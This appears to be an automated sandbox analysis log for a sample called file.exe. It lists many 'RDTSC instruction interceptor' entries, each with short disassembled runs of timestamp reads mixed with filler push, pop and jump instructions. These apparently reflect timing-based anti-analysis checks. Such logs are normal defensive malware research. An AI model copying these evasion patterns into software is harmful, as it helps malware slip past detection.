          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1F10 second address: 8D1F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1F1A second address: 8D1F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD20 second address: 8CFD2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1C8D96868h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD2E second address: 8CFD46 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1C8D8FEBCh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD46 second address: 8CFD50 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE1C8D96866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB87D second address: 8DB881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB9E0 second address: 8DB9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB9E4 second address: 8DB9E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB9E8 second address: 8DB9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D96871h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBB5A second address: 8DBB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FE1C8D8FEC2h 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DBB78 second address: 8DBB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD3E5 second address: 8DD3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD3E9 second address: 8DD3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD3EF second address: 8DD3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD3F4 second address: 8DD3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA4D1 second address: 8EA4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA4D5 second address: 8EA4EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Bh 0x00000007 jns 00007FE1C8D96866h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA4EE second address: 8EA4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA4F2 second address: 8EA4F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA4F6 second address: 8EA505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE1C8D8FEB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA505 second address: 8EA518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE1C8D9686Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA518 second address: 8EA523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA523 second address: 8EA527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA527 second address: 8EA534 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA534 second address: 8EA53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA53A second address: 8EA567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEC5h 0x00000009 popad 0x0000000a jmp 00007FE1C8D8FEBFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC941 second address: 8EC949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECAB2 second address: 8ECAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEC1h 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d jnc 00007FE1C8D8FEB6h 0x00000013 jc 00007FE1C8D8FEB6h 0x00000019 pop esi 0x0000001a pushad 0x0000001b jmp 00007FE1C8D8FEC2h 0x00000020 jmp 00007FE1C8D8FEBBh 0x00000025 popad 0x00000026 jl 00007FE1C8D8FEBCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF76B second address: 8EF779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF779 second address: 8EF77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F41F1 second address: 8F41FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FE1C8D96866h 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F41FE second address: 8F4209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FE1C8D8FEB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900894 second address: 90089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901EB2 second address: 901EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90764F second address: 907653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90610D second address: 906111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906111 second address: 906115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906115 second address: 906133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE1C8D8FEB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FE1C8D8FEC2h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906133 second address: 90613F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE1C8D96866h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9062EB second address: 9062F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906652 second address: 90666E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE1C8D96866h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FE1C8D9686Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9067D8 second address: 9067DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B906 second address: 90B913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE1C8D96866h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B913 second address: 90B918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B918 second address: 90B91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA78 second address: 90BA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA7E second address: 90BA88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA88 second address: 90BA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA8C second address: 90BA96 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA96 second address: 90BAA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BAA4 second address: 90BAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BAAA second address: 90BAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91526A second address: 91526F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91526F second address: 915292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FE1C8D8FEC8h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916AA5 second address: 916AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE1C8D96871h 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FE1C8D9686Fh 0x00000016 jno 00007FE1C8D96866h 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B6D2 second address: 91B6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEC3h 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE1C8D8FEB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B6F3 second address: 91B6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CC30 second address: 91CC3A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921F7E second address: 921F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921F82 second address: 921F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jno 00007FE1C8D8FEB6h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921DED second address: 921E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FE1C8D96873h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921E0A second address: 921E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FF6C second address: 92FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007FE1C8D96866h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FF7B second address: 92FF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FF7F second address: 92FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FB64 second address: 92FB6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FB6A second address: 92FB76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE1C8D96866h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9447A8 second address: 9447AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9448D9 second address: 9448E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9448E4 second address: 9448E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944A44 second address: 944A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE1C8D96866h 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944BB0 second address: 944BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FE1C8D8FEC9h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944BD5 second address: 944BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D96871h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944BF0 second address: 944BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944BF6 second address: 944C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FE1C8D96866h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944C03 second address: 944C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E3E second address: 944E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E43 second address: 944E67 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1C8D8FECEh 0x00000008 jmp 00007FE1C8D8FEC8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E67 second address: 944E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E6D second address: 944E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E71 second address: 944E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944FE4 second address: 944FEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944FEA second address: 944FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944FF0 second address: 945012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007FE1C8D8FEBCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945012 second address: 945019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945181 second address: 94519D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D8FEC8h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94519D second address: 9451A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94533D second address: 945341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9454E7 second address: 9454FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jno 00007FE1C8D96866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9454FA second address: 945500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AC47 second address: 94AC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AFA9 second address: 94AFAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CA52 second address: 94CA59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E481 second address: 94E4AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE1C8D8FEC2h 0x00000013 jmp 00007FE1C8D8FEBDh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230323 second address: 5230350 instructions: 0x00000000 rdtsc 0x00000002 mov ah, C5h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007FE1C8D9686Dh 0x0000000e adc si, FE56h 0x00000013 jmp 00007FE1C8D96871h 0x00000018 popfd 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230350 second address: 523037E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE1C8D8FEC0h 0x00000008 adc si, A878h 0x0000000d jmp 00007FE1C8D8FEBBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523037E second address: 5230384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230384 second address: 52303B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 158D669Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE1C8D8FEC0h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov cx, A2DDh 0x00000017 mov cx, 8FD9h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52303FB second address: 5230424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96876h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE1C8D9686Ah 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230424 second address: 523042A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523042A second address: 523043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D9686Dh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523043B second address: 523043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52507FC second address: 5250800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
